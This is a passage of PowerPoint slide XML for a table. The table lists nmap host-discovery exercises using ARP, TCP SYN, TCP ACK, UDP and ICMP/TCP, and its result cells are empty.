                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>节点参数</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="1">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="420370">
                <a:tc rowSpan="7">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>nmap主机扫描</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="1">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>1.ARP的主机发现并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="419735">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>2.TCP SYN协议的主机发现并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="420370">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>3.TCP ACK协议的主机发现并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="420370">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>4.UDP协议的主机发现并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="420370">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>5.ICMP和TCP协议的主机发现并分析</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1400" b="0">
                        <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="0" marB="0" vert="horz" anchor="ctr" anchorCtr="0">
                    <a:lnL w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnL>
                    <a:lnR w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="080000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
